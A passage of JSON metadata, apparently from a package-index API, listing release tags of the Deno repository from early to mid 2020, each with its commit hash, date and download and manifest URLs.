_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0